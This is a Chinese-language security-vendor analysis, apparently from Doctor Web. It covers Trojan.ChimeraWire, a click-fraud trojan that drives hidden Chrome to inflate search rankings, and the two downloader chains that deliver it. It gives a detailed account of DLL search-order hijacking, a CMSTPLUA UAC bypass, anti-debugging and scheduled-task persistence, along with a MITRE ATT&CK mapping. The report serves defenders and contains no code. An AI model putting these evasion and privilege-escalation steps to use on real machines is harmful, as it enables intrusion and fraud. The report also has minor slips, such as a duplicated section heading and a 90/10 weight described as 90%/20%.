&lt;p&gt;攻击者利用&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;模仿用户操作，人为提升网站的指标，目的是提高网站在搜索引擎的排名。恶意软件会在Google和Bing中搜索目标网站，然后将其打开，还会模仿用户操作，自动点击已加载网站的链接。该木马执行所有恶意操作利用的都是从特定来源下载并通过WebSocket协议以隐蔽调试模式运行的浏览器GoogleChrome。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;传播到计算机的途径是通过多个恶意下载器。这些下载器利用DLL搜索顺序劫持漏洞，并采用各种提权技术以及反调试技术来逃避侦测。我们的反病毒实验室已追踪到至少两条涉及这些下载器的感染链。其中一条感染链的中心环节是恶意脚本&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;。另一条使用的则是恶意软件&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;，该恶意软件的运行方式与&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;类似，实际上是其替代品。&lt;/p&gt;

&lt;p&gt;本研究报告将分析&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;及其感染用户计算机所利用的恶意软件的特征。&lt;/p&gt;

&lt;h3&gt;第一种感染链&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;第一种感染链的运行轨迹&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;第一条感染链从运行&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54600&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;开始。这个木马会检查自身是否是在特殊合成的环境中运行，发现有虚拟机或调试模式的迹象就会终止运行。没有发现此类迹象时木马会从C2服务器下载ZIP压缩包&lt;span class="string"&gt;python3.zip&lt;/span&gt;。压缩包包含恶意Python脚本&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;及其运行所需的辅助文件，具体来说就是恶意库&lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;（&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Starter.8377&amp;lng=cn"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;）。&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54600&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;将压缩包解压缩并运行脚本。这个脚本是感染链的第二阶段，是一个下载器，会从C2服务器下载下一阶段所用的程序。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;的行为取决于其运行时所具备的权限。如脚本没有管理员权限，就会尝试获取管理员权限。具体方法是与其一起提取出的&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Starter.8377&amp;lng=cn"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;会被复制到目录&lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;。此外，还会创建脚本&lt;span class="string"&gt;runs.vbs&lt;/span&gt;，用于之后重新启动&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;然后&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;会启动系统应用程序&lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;。这个应用因存在DLL搜索顺序劫持漏洞会自动加载名称与Windows操作系统合法组件名称相同的木马库ISCSIEXE.dll&lt;/p&gt;

&lt;p&gt;而&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Starter.8377&amp;lng=cn"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;则会启动VBS脚本&lt;span class="string"&gt;runs.vbs&lt;/span&gt;，利用这个脚本以管理员权限重新执行&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;获得所需权限后，&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;会从C2服务器下载受密码保护的压缩包&lt;span class="string"&gt;onedrive.zip&lt;/span&gt;。压缩包包含实施下一阶段感染所使用的程序：恶意软件&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54318&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;、名为&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;的库文件以及必要的辅助文件（如与OneDrive软件相关的、具有有效数字签名的Windows合法应用&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;）。&lt;/p&gt;

&lt;p&gt;压缩包解压后，&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;会在系统任务计划器创建一个任务，以便在系统启动时运行&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;。然后会启动这个应用程序。由于存在DLL搜索顺序劫持漏洞，该程序会自动加载其名称与OneDrive软件组件的名称匹配的恶意库&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;。&lt;/p&gt;

&lt;p&gt;获得控制权后，&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54318&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;会检查自身是否是在合成环境下运行。如果发现任何在虚拟机或调试模式下运行的迹象，就会终止运行。&lt;/p&gt;

&lt;p&gt;没有检测到此类迹象时木马会尝试从C2服务器下载有效载荷以及用于解密的加密密钥。&lt;/p&gt;

&lt;p&gt;解密后的有效载荷是一个包含shellcode和可执行文件的ZLIB容器。解密容器后，&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54318&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;会尝试将容器解压。如果解压失败，木马会将自身自行删除，终止感染。如解压成功，控制权就转移给shellcode，其任务是将随附可执行文件解压。而这个可执行文件就是感染过程的最后阶段——目标功能木马&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;h3&gt;第一种感染链&lt;/h3&gt;

&lt;p&gt;第二条攻击链从运行恶意软件&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;开始。启动后，这个恶意软件会检查是否具备管理员权限，没有就会尝试获取权限。木马使用MasqueradePEB技术将自身伪装成合法进程&lt;span class="string"&gt;explorer.exe&lt;/span&gt;来绕过安全系统。&lt;/p&gt;

&lt;p&gt;然后木马会给系统库&lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;的副本打补丁。具体操作是&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;读取文件的内容，然后向其添加解密后的字节码和文件路径，并将修改后的版本在原目录保存为名为&lt;span class="string"&gt;dropper&lt;/span&gt;的文件。之后，木马会为&lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt;服务和修改后的库进行WindowsshellCOM对象初始化。成功进行初始化后&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;会尝试利用CMSTPLUACOM接口获取管理员权限，利用的是某些旧版COM接口中存在的漏洞。如漏洞利用成功，修改后的&lt;span class="string"&gt;dropper&lt;/span&gt;库会以ATL.dll文件复制到目录&lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt;。&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;随后会启动WMI系统管理单元&lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;，这个单元利用mmc.exe系统应用程序中的DLL搜索顺序劫持漏洞，自动加载带有补丁的&lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt;库。之后，mmc.exe会重新启动&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;，而且这次木马已具备管理员权限。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;不具备管理员权限的情况下&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;的运行轨迹&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;以管理员权限运行时，&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;会通过执行多个PowerShell脚本来从C2服务器下载有效载荷。其中一个是ZIP压缩包&lt;span class="string"&gt;one.zip&lt;/span&gt;，所包含的文件与第一中感染链中&lt;span class="string"&gt;onedrive.zip&lt;/span&gt;压缩包的文件类似（具体来说就是合法程序&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;和恶意库&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;—&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54318&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;）。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;解压压缩包，并在系统计划程序中创建任务，以便在系统启动时&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;能够自动运行。木马还会直接启动此应用程序。与第一中感染链类似，启动后，&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;会利用DLL搜索顺序劫持漏洞，自动下载木马库&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;。之后，会重复第一种感染链之后的感染步骤。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;还会下载第二个ZIP压缩包：&lt;span class="string"&gt;two.zip&lt;/span&gt;。压缩包包含恶意脚本&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;（&lt;span class="string"&gt;update.py&lt;/span&gt;）以及运行该脚本所需的文件，其中包括&lt;span class="string"&gt;Guardian.exe&lt;/span&gt;，是一个重命名的Python控制台解释器&lt;span class="string"&gt;pythonw.exe&lt;/span&gt;。&lt;/p&gt;

&lt;p&gt;压缩包解压后，&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;会在系统计划程序中创建一个任务，以便在系统启动时自动启动&lt;span class="string"&gt;Guardian.exe&lt;/span&gt;，还会通过此应用程序直接执行恶意脚本&lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;攻击者显然是想通过部分重复第一个感染链来提高&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;成功下载到目标系统的可能性。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;具备管理员权限后&lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;的运行轨迹&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;的名称是“喀迈拉”（希腊神话中的怪物，由多种动物的身体部位组成）和“电线”（wire）两个词的组合。使用“喀迈拉”一词是突出攻击者所使用方法的混合性，包括使用不同语言编写的木马下载器，还有在感染过程中同时采用反调试技术和权限提升手段，也代表这个木马结合使用各种框架、插件，并利用合法软件来实现对流量的隐蔽管理。第二个词“电线”则是将木马隐蔽且恶意的网络交互行为形象化。&lt;/blockquote&gt;

&lt;p&gt;感染目标计算机后，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;会从第三方网站下载一个名为&lt;span class="string"&gt;chrome-win.zip&lt;/span&gt;的ZIP压缩包，是一个支持Windows系统的GoogleChrome浏览器。值得注意的是，这个网站还存储有适用于其他系统（例如Linux和macOS）的GoogleChrome浏览器版本，包括适用不同硬件平台的版本。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个提供各种谷歌Chrome浏览器版本的网站，木马程序会从中下载所需的压缩包&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;下载浏览器后，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;会暗中尝试在浏览器安装NopeCHA和Buster两个插件，都是用于自动识别验证码，供木马在其运行过程中使用。&lt;/p&gt;

&lt;p&gt;然后，木马会在不显示窗口的情况下以调试模式启动浏览器，从而在不引起用户注意的情况下执行恶意活动。之后，会通过WebSocket协议连接到自动选择的调试端口。&lt;/p&gt;

&lt;p&gt;接下来，木马就会开始接收任务。向C2服务器发送请求后木马收到的响应是一个使用AES-GCM算法加密的JSON格式base64字符串。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;C2服务器发送给木马的配置示例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;配置包含的任务和相关参数：&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;目标搜索引擎（支持Google和Bing）；&lt;/li&gt;
    &lt;li&gt;在指定搜索引擎搜索并打开网站的关键词短语；&lt;/li&gt;
    &lt;li&gt;最大连续页面跳转次数；&lt;/li&gt;
    &lt;li&gt;在网页上执行自动点击的随机分布；&lt;/li&gt;
    &lt;li&gt;页面加载超时时间；&lt;/li&gt;
    &lt;li&gt;目标域名。&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;为更为真实模拟人类活动并绕过跟踪持续活动的系统，该配置还包含会话之间暂停操作的参数。&lt;/p&gt;

&lt;h3&gt;模仿用户鼠标点击&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;能够执行以下类型的点击：&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;浏览搜索结果；&lt;/li&gt;
    &lt;li&gt;在新后台标签打开相关链接。&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;首先，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;使用指定的搜索引擎搜索其配置中所指定的域名和关键词。然后会打开搜索结果中的网站，并找到定义超链接的所有HTML元素。木马将这些元素放入一个数据数组中，并打乱其顺序，使其与网页中的顺序不同。这样做是为了绕过网站的反机器人保护机制，因为这些机制可以追踪点击顺序。&lt;/p&gt;

&lt;p&gt;接下来，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;会检查找到的链接是否有效以及链接中的字符串是否与配置中指定的模板匹配，然后统计匹配的总数。木马程序的后续操作取决于统计结果。&lt;/p&gt;

&lt;p&gt;如果页面上找到足够多的匹配链接，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;会扫描页面并按匹配度将找到的链接进行排序（与关键词匹配度最高的链接排在最前面），然后会点击一个或多个匹配的链接。&lt;/p&gt;

&lt;p&gt;如果匹配的链接数量不足或没有匹配的链接，恶意软件就会使用一种能够高度模拟真实用户操作的概率行为模型算法。根据配置中的参数，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;使用加权随机分布来确定要点击的链接数量。例如，&lt;span class="string"&gt;["1:90","2:10"]&lt;/span&gt;就表示&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;有90%的概率点击一个链接，有20%的概率点击两个链接。因此，极有可能是只点击一个链接。木马程序会从预先准备好的链接数组中随机选择一个链接进行点击。&lt;/p&gt;

&lt;p&gt;每次点击搜索结果中的链接或点击加载的页面后，木马程序会根据任务返回上一个标签页或切换到下一个标签页。此操作序列会重复执行，直到达到目标网站的点击次数上限。&lt;/p&gt;

&lt;p&gt;以下是C2服务器发送给木马的任务中包含其参数的一些网站示例：&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;木马ChimeraWire及其下载过程中所使用的其他恶意软件的详细技术说明请参阅PDF版研究报告和DoctorWeb公司病毒知识库。&lt;/p&gt;

&lt;p&gt;
    &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;更多详情&lt;br /&gt;
    &lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54600&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;更多详情&lt;br /&gt;
    &lt;a href="https://vms.drweb.cn/search/?q=Trojan.Starter.8377&amp;lng=cn"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;更多详情&lt;br /&gt;
    &lt;a href="https://vms.drweb.cn/search/?q=Python.Downloader.208&amp;lng=cn"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;更多详情&lt;br /&gt;
    &lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.54318&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;更多详情&lt;br /&gt;
    &lt;a href="https://vms.drweb.cn/search/?q=Trojan.DownLoader48.61444&amp;lng=cn"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;更多详情
&lt;/p&gt;

&lt;h3&gt;结论&lt;/h3&gt;

&lt;p&gt;目前，&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;的恶意活动主要限于执行相对简单的点击操作，目的只是提升网站访问量。然而，其底层工具的功能可以执行更广泛的任务，包括伪装成合法用户活动的各种自动化操作。例如，攻击者可以利用木马填写网页表单，包括那些为广告服务的调查网站的表单。还可以利用木马读取网页内容并创建屏幕截图，也就是可以用来进行网络间谍活动或者自动将信息收集到数据库（例如电子邮箱地址、电话号码等）。&lt;/p&gt;

&lt;p&gt;因此，未来可能会出现能够实现上述功能及其他功能的&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;新版本。我公司专家将持续关注这个木马的发展动态。&lt;/p&gt;

&lt;p&gt;MITRE ATT&amp;CK®&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;步骤&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;技术&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;执行&lt;/td&gt;
            &lt;td&gt;用户参与执行(T1204)&lt;br /&gt;&lt;br /&gt;恶意文件(T1204.002)&lt;br /&gt;&lt;br /&gt;恶意库(T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Windows命令提示符(T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Windows任务计划程序(T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;持久性&lt;/td&gt;
            &lt;td&gt;Windows注册表中的启动项/自启动目录(T1547.001)&lt;br /&gt;&lt;br /&gt;计划任务/任务(T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;特权提升&lt;/td&gt;
            &lt;td&gt;流程劫持：DLL查找劫持(T1574.001)&lt;br /&gt;&lt;br /&gt;绕过用户帐户监控(T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;防御逃避&lt;/td&gt;
            &lt;td&gt;加密/编码文件(T1027.013)&lt;br /&gt;&lt;br /&gt;调试规避(T1622)&lt;br /&gt;&lt;br /&gt;隐藏窗口(T1564.003)&lt;br /&gt;&lt;br /&gt;文件或路径异常(T1564.012)&lt;br /&gt;&lt;br /&gt;文件或数据的反混淆/解码(T1140)&lt;br /&gt;&lt;br /&gt;流程劫持：DLL查找劫持(T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;命令和控制&lt;/td&gt;
            &lt;td&gt;双向通信(T1102.002)&lt;br /&gt;&lt;br /&gt;Web协议(T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;失陷指标&lt;/a&gt;</description></item></channel></rss>
